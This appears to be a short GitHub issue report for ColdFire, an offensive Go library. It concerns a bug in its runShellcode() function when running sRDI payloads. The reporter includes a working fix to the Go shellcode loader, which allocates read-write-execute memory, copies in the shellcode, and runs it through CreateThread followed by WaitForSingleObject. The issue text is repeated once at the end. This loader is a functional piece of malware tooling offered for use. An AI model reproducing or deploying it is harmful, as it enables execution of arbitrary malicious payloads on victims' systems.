Tested an sRDI shellcode payload with the coldfire.runShellcode() function and it fails to execute the shellcode correctly.
Looking at the source for the function and it appears the issue lies with CreateThread without calling WaitForSingleObject afterwards. I added the WaitForSingleObject API and tested the payload and it seemed to fix the issue.
// ColdFire implementation
var bg_run uintptr = 0x00
kernel32 := syscall.MustLoadDLL("kernel32.dll")
VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
procCreateThread := kernel32.MustFindProc("CreateThread")
waitForSingleObject := kernel32.MustFindProc("WaitForSingleObject")
addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), 0x2000|0x1000, syscall.PAGE_EXECUTE_READWRITE)
ptr := (*[990000]byte)(unsafe.Pointer(addr))
for i, value := range shellcode {
ptr[i] = value
}
threadHandle, _, _ := procCreateThread.Call(0, 0, addr, 0, bg_run, 0)
waitForSingleObject.Call(threadHandle, uintptr(^uint(0)))
Tested an sRDI shellcode payload with the coldfire.runShellcode() function and it fails to execute the shellcode correctly.
Looking at the source for the function and it appears the issue lies with CreateThread without calling WaitForSingleObject afterwards. I added the
WaitForSingleObject
API and tested the payload and it seemed to fix the issue.